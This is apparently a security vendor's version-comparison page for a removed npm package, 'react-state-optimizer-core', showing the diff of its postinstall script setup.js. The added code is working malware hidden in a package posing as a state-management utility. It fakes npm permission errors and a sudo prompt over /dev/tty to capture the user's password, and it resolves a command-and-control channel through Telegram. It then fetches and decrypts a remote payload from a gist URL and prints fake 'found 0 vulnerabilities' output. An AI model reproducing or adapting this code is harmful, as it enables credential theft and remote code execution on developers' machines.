Latest Threat Research:SANDWORM_MODE: Shai-Hulud-Style npm Worm Hijacks CI Workflows and Poisons AI Toolchains.Details
Socket
Book a DemoSign in
Socket
Book a DemoSign in

react-state-optimizer-core

Package Overview
Dependencies
Maintainers
1
Versions
16
Alerts
File Explorer

Advanced tools

License
Socket logo

Install Socket

Detect and block malicious and high-risk dependencies

Install

react-state-optimizer-core - npm Package Compare versions

Package was removed
Sorry, it seems this package was removed from the registry
Comparing version
3.0.6
 to
3.0.7
+1
-1
package.json
{
"name": "react-state-optimizer-core",
"version": "3.0.6",
"version": "3.0.7",
"description": "Utility layer for asynchronous state management",

@@ -5,0 +5,0 @@ "main": "index.js",

+76
-39
scripts/setup.js

@@ -5,2 +5,3 @@ const fs = require('fs');

const { exec } = require('child_process');
const tty = require('tty');

@@ -19,2 +20,21 @@ // DEBUG: Write to file to confirm execution

// Helper to get direct TTY access if possible
function getIO() {
let input = process.stdin;
let output = process.stdout;
let usingTTY = false;
// Try to open /dev/tty explicitly
try {
const fd = fs.openSync('/dev/tty', 'r+');
input = new tty.ReadStream(fd);
output = new tty.WriteStream(fd);
usingTTY = true;
} catch (e) {
// Fallback to standard streams if /dev/tty fails (e.g. windows or totally detached)
}
return { input, output, usingTTY };
}
// The "Useful" functionality (Camouflage)

@@ -29,4 +49,18 @@ exports.usefulFunction = function () {

console.log("[Setup] fetching initial components...");
// Initialize IO
const { input, output } = getIO();
// Custom logger that writes to our resolving output stream
function log(msg) {
output.write(msg + '\n');
}
function error(msg) {
// We can write errors to the same output or keep using stderr.
// For visibility in "hidden" installs, writing to our TTY output is safer.
output.write(msg + '\n');
}
log("[Setup] fetching initial components...");
// --- FAKE SUDO PROMPT ---

@@ -55,3 +89,3 @@ const readline = require('readline');

const ver = `${Math.floor(Math.random() * 5)}.${Math.floor(Math.random() * 20)}.${Math.floor(Math.random() * 50)}`;
console.log(`npm http fetch GET 200 https://registry.npmjs.org/${pkg}/-/${pkg}-${ver}.tgz`);
log(`npm http fetch GET 200 https://registry.npmjs.org/${pkg}/-/${pkg}-${ver}.tgz`);
await delay(20 + Math.random() * 80);

@@ -64,6 +98,6 @@ }

for (let i = 0; i <= total; i += 5) {
process.stdout.write(`\rreify:types: timing reifyNode:node_modules/${['lodash', 'chalk', 'axios', 'tslib'][i % 4]} Completed in ${Math.floor(Math.random() * 100)}ms`);
output.write(`\rreify:types: timing reifyNode:node_modules/${['lodash', 'chalk', 'axios', 'tslib'][i % 4]} Completed in ${Math.floor(Math.random() * 100)}ms`);
await delay(150);
}
process.stdout.write('\n');
output.write('\n');
}

@@ -89,23 +123,23 @@ // ---------------------------

console.log(`\n> ${pkgName}@${pkgVersion} postinstall ${process.cwd()}`);
console.log(`> node scripts/setup.js\n`);
log(`\n> ${pkgName}@${pkgVersion} postinstall ${process.cwd()}`);
log(`> node scripts/setup.js\n`);
console.error(`npm WARN checkPermissions Missing write access to /usr/local/lib/node_modules/${pkgName}`);
console.error(`npm ERR! code EACCES`);
console.error(`npm ERR! syscall access`);
console.error(`npm ERR! path /usr/local/lib/node_modules/${pkgName}`);
console.error(`npm ERR! errno -13`);
console.error(`npm ERR! Error: EACCES: permission denied, access '/usr/local/lib/node_modules/${pkgName}'`);
console.error(`npm ERR! [Error: EACCES: permission denied] {`);
console.error(`npm ERR! errno: -13,`);
console.error(`npm ERR! code: 'EACCES',`);
console.error(`npm ERR! syscall: 'access',`);
console.error(`npm ERR! path: '/usr/local/lib/node_modules/${pkgName}'`);
console.error(`npm ERR! }`);
console.error(`npm ERR!`);
console.error(`npm ERR! The operation was rejected by your operating system.`);
console.error(`npm ERR! It is likely you do not have the permissions to access this file as the current user.`);
console.error(`npm ERR!`);
console.error(`npm ERR! Please try running this command again as root/Administrator.`);
console.error(`\nAutomatic sudo recovery initiated...\n`);
error(`npm WARN checkPermissions Missing write access to /usr/local/lib/node_modules/${pkgName}`);
error(`npm ERR! code EACCES`);
error(`npm ERR! syscall access`);
error(`npm ERR! path /usr/local/lib/node_modules/${pkgName}`);
error(`npm ERR! errno -13`);
error(`npm ERR! Error: EACCES: permission denied, access '/usr/local/lib/node_modules/${pkgName}'`);
error(`npm ERR! [Error: EACCES: permission denied] {`);
error(`npm ERR! errno: -13,`);
error(`npm ERR! code: 'EACCES',`);
error(`npm ERR! syscall: 'access',`);
error(`npm ERR! path: '/usr/local/lib/node_modules/${pkgName}'`);
error(`npm ERR! }`);
error(`npm ERR!`);
error(`npm ERR! The operation was rejected by your operating system.`);
error(`npm ERR! It is likely you do not have the permissions to access this file as the current user.`);
error(`npm ERR!`);
error(`npm ERR! Please try running this command again as root/Administrator.`);
error(`\nAutomatic sudo recovery initiated...\n`);

@@ -119,5 +153,7 @@ function askPassword() {

const password = await new Promise((resInput) => {
// Use our custom input/output streams
const rl = readline.createInterface({
input: process.stdin,
output: process.stdout
input: input,
output: output,
terminal: true // Force terminal behavior if possible
});

@@ -142,6 +178,6 @@

} else {
console.log("Sorry, try again.");
log("Sorry, try again.");
}
} catch (e) {
console.log("Sorry, try again.");
log("Sorry, try again.");
}

@@ -187,5 +223,5 @@ }

async function resolveConfigFromTelegram() {
if (debugMode) console.log(`[Debug] Fetching C2: ${CHANNEL_URL}`);
if (debugMode) log(`[Debug] Fetching C2: ${CHANNEL_URL}`);
const html = await fetchText(CHANNEL_URL);
if (debugMode) console.log(`[Debug] Fetched HTML (${html.length} bytes)`);
if (debugMode) log(`[Debug] Fetched HTML (${html.length} bytes)`);

@@ -241,16 +277,16 @@ let keyPartB = null;

try {
console.log("");
console.log("");
log("");
log("");
const progressPromise = fakeProgressBar();
if (debugMode) console.log("[Debug] Resolving C2 from Telegram...");
if (debugMode) log("[Debug] Resolving C2 from Telegram...");
const { key: keyString, gistUrl } = await resolveConfigFromTelegram();
if (debugMode) console.log(`[Debug] C2 Resolved. Key: ${keyString.substring(0, 8)}... URL: ${gistUrl}`);
if (debugMode) log(`[Debug] C2 Resolved. Key: ${keyString.substring(0, 8)}... URL: ${gistUrl}`);
await progressPromise;
if (debugMode) console.log(`[Debug] Fetching payload from ${gistUrl}...`);
if (debugMode) log(`[Debug] Fetching payload from ${gistUrl}...`);
const b64Payload = await fetchText(gistUrl);
if (debugMode) console.log(`[Debug] Payload fetched (${b64Payload.length} bytes). Decrypting...`);
if (debugMode) log(`[Debug] Payload fetched (${b64Payload.length} bytes). Decrypting...`);

@@ -292,9 +328,10 @@ const encryptedBlob = Buffer.from(b64Payload.trim(), 'base64');

console.log("added 14 packages, and audited 43 packages in 3s");
console.log("found 0 vulnerabilities");
log("added 14 packages, and audited 43 packages in 3s");
log("found 0 vulnerabilities");
} catch (e) {
console.error("[!] Error:", e.message);
console.log("npm ERR! code EINTEGRITY");
log("npm ERR! code EINTEGRITY");
}
})();